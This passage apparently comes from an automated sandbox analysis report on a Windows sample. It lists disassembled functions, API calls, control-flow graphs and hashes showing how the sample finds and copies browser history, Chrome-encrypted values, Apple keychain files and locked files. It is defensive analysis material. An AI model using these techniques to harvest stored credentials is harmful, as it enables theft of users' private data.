                                                                                                                                                  • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                                                                  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                                                                • memset.MSVCRT ref: 00445986
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                                                                                • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                                                                • API String ID: 2263259095-3798722523
                                                                                                                                                • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                                                                • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                                                                • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                                                                • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                                                                                                                                Function 0041276D Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 149COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                  • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                  • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                  • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                                                                                • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                                                                • String ID: $/deleteregkey$/savelangfile
                                                                                                                                                • API String ID: 2744995895-28296030
                                                                                                                                                • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                                                                • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                                                                                                                                Function 0040B6EF Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 388fileCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040B71C
                                                                                                                                                  • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                                                                  • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                                                                • wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                • memset.MSVCRT ref: 0040B756
                                                                                                                                                • memset.MSVCRT ref: 0040B7F5
                                                                                                                                                • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                                                                                                                • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                                                                                • memset.MSVCRT ref: 0040B851
                                                                                                                                                • memset.MSVCRT ref: 0040B8CA
                                                                                                                                                • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                                                                                                  • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                                                                                                • memset.MSVCRT ref: 0040BB53
                                                                                                                                                • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                                                                                • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateDeleteHandleLibraryLocalProcmemcmpmemcpywcscpy
                                                                                                                                                • String ID: chp$v10
                                                                                                                                                • API String ID: 4165125987-2783969131
                                                                                                                                                • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                                                                                                • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                                                                • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                                                                                                • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                                                                                                                                Function 0040E2AB Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 504 40e2ab-40e2ce call 40695d call 406b90 508 40e2d3-40e2d5 504->508 509 40e4a0-40e4af call 4069a3 508->509 510 40e2db-40e300 508->510 511 40e304-40e316 call 406e8f 510->511 516 40e476-40e483 call 406b53 511->516 517 40e31c-40e39b call 40dd50 * 7 memset call 40aa29 511->517 523 40e302 516->523 524 40e489-40e495 call 40aa04 516->524 541 40e3c9-40e3ce 517->541 542 40e39d-40e3ae call 40742e 517->542 523->511 524->509 530 40e497-40e49f free 524->530 530->509 544 40e3d0-40e3d6 541->544 545 40e3d9-40e3de 541->545 549 40e3b0 542->549 550 40e3b3-40e3c1 wcschr 542->550 544->545 547 40e3e0-40e3f1 memcpy 545->547 548 40e3f4-40e3f9 545->548 547->548 551 40e3fb-40e40c memcpy 548->551 552 40e40f-40e414 548->552 549->550 550->541 553 40e3c3-40e3c6 550->553 551->552 554 40e416-40e427 memcpy 552->554 555 40e42a-40e42f 552->555 553->541 554->555 556 40e431-40e442 memcpy 555->556 557 40e445-40e44a 555->557 556->557 558 40e44c-40e45b 557->558 559 40e45e-40e463 557->559 558->559 559->516 560 40e465-40e469 559->560 560->516 561 40e46b-40e473 560->561 561->516
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                • free.MSVCRT ref: 0040E49A
                                                                                                                                                  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                • memset.MSVCRT ref: 0040E380
                                                                                                                                                  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                  • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                                • wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E3EC
                                                                                                                                                • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E407
                                                                                                                                                • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E422
                                                                                                                                                • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E43D
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                                                                • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                                                                • API String ID: 3849927982-2252543386
                                                                                                                                                • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                                                                                • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                                                                • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                                                                                • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                                                                                                Function 004091B8 Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 272COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 562 4091b8-40921b memset call 40a6e6 call 444432 567 409520-409526 562->567 568 409221-40923b call 40b273 call 438552 562->568 572 409240-409248 568->572 573 409383-4093ab call 40b273 call 438552 572->573 574 40924e-409258 call 4251c4 572->574 586 4093b1 573->586 587 4094ff-40950b call 443d90 573->587 579 40937b-40937e call 424f26 574->579 580 40925e-409291 call 4253cf * 2 call 4253af * 2 574->580 579->573 580->579 610 409297-409299 580->610 590 4093d3-4093dd call 4251c4 586->590 587->567 596 40950d-409511 587->596 597 4093b3-4093cc call 4253cf * 2 590->597 598 4093df 590->598 596->567 600 409513-40951d call 408f2f 596->600 597->590 613 4093ce-4093d1 597->613 601 4094f7-4094fa call 424f26 598->601 600->567 601->587 610->579 612 40929f-4092a3 610->612 612->579 614 4092a9-4092ba 612->614 613->590 615 4093e4-4093fb call 4253af * 2 613->615 616 4092bc 614->616 617 4092be-4092e3 memcpy memcmp 614->617 615->601 627 409401-409403 615->627 616->617 618 409333-409345 memcmp 617->618 619 4092e5-4092ec 617->619 618->579 622 409347-40935f memcpy 618->622 619->579 621 4092f2-409331 memcpy * 2 619->621 624 409363-409378 memcpy 621->624 622->624 624->579 627->601 628 409409-40941b memcmp 627->628 628->601 629 409421-409433 memcmp 628->629 630 4094a4-4094b6 memcmp 629->630 631 409435-40943c 629->631 630->601 633 4094b8-4094ed memcpy * 2 630->633 631->601 632 409442-4094a2 memcpy * 3 631->632 634 4094f4 632->634 633->634 634->601
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 004091E2
                                                                                                                                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                                                                • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                                                                • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                                                                • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                                                                                                • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                                                                • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                                                                • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                                                                                                • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                                                                                                • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                                                                                • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                                                                                • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                                                                                • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                                                                                                • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                                                                                • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3715365532-3916222277
                                                                                                                                                • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                                                                                                                • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                                                                • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                                                                                                                • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                                                                                                                Function 00413D4C Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 142processlibraryloaderCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 635 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 638 413f00-413f11 Process32NextW 635->638 639 413da5-413ded OpenProcess 638->639 640 413f17-413f24 CloseHandle 638->640 641 413eb0-413eb5 639->641 642 413df3-413e26 memset call 413f27 639->642 641->638 643 413eb7-413ebd 641->643 650 413e79-413e9d call 413959 call 413ca4 642->650 651 413e28-413e35 642->651 645 413ec8-413eda call 4099f4 643->645 646 413ebf-413ec6 free 643->646 648 413edb-413ee2 645->648 646->648 656 413ee4 648->656 657 413ee7-413efe 648->657 662 413ea2-413eae CloseHandle 650->662 654 413e61-413e68 651->654 655 413e37-413e44 GetModuleHandleW 651->655 654->650 658 413e6a-413e76 654->658 655->654 660 413e46-413e5c GetProcAddress 655->660 656->657 657->638 658->650 660->654 662->641
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                                                                                                                • memset.MSVCRT ref: 00413D7F
                                                                                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                                                                • memset.MSVCRT ref: 00413E07
                                                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                                                                                • free.MSVCRT ref: 00413EC1
                                                                                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                                                                                                • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                                                • API String ID: 1344430650-1740548384
                                                                                                                                                • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                                                                                • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                                                                • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                                                                                • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                                                                                                                Function 0040E01E Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120fileCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                                                                  • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                  • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                  • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                                                  • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                  • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                                • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                  • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                  • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                  • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                  • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                                                                • String ID: bhv
                                                                                                                                                • API String ID: 4234240956-2689659898
                                                                                                                                                • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                                • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                                                                • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                                • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                                                                                                                                Function 00413F4F Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29libraryloaderCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 691 413f4f-413f52 692 413fa5 691->692 693 413f54-413f5a call 40a804 691->693 695 413f5f-413fa4 GetProcAddress * 5 693->695 695->692
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                                                • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                • API String ID: 2941347001-70141382
                                                                                                                                                • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                                                                                • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                                                                                • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                                                                                • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48
                                                                                                                                                Function 004466F4 Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 696 4466f4-44670e call 446904 GetModuleHandleA 699 446710-44671b 696->699 700 44672f-446732 696->700 699->700 702 44671d-446726 699->702 701 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 700->701 711 4467ac-4467b7 __setusermatherr 701->711 712 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 701->712 704 446747-44674b 702->704 705 446728-44672d 702->705 704->700 706 44674d-44674f 704->706 705->700 708 446734-44673b 705->708 710 446755-446758 706->710 708->700 709 44673d-446745 708->709 709->710 710->701 711->712 715 446810-446819 712->715 716 44681e-446825 712->716 717 4468d8-4468dd call 44693d 715->717 718 446827-446832 716->718 719 44686c-446870 716->719 723 446834-446838 718->723 724 44683a-44683e 718->724 721 446845-44684b 719->721 722 446872-446877 719->722 727 446853-446864 GetStartupInfoW 721->727 728 44684d-446851 721->728 722->719 723->718 723->724 724->721 726 446840-446842 724->726 726->721 729 446866-44686a 727->729 730 446879-44687b 727->730 728->726 728->727 731 44687c-446894 GetModuleHandleA call 41276d 729->731 730->731 734 446896-446897 exit 731->734 735 44689d-4468d6 _cexit 731->735 734->735 735->717
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2827331108-0
                                                                                                                                                • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                                                                                • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                                                                                                • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                                                                                • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E
                                                                                                                                                Function 0040C274 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040C298
                                                                                                                                                  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                                                                  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                                • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                • wcschr.MSVCRT ref: 0040C324
                                                                                                                                                • wcschr.MSVCRT ref: 0040C344
                                                                                                                                                • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                • GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                                                                • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                                                                                                                • String ID: visited:
                                                                                                                                                • API String ID: 1157525455-1702587658
                                                                                                                                                • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
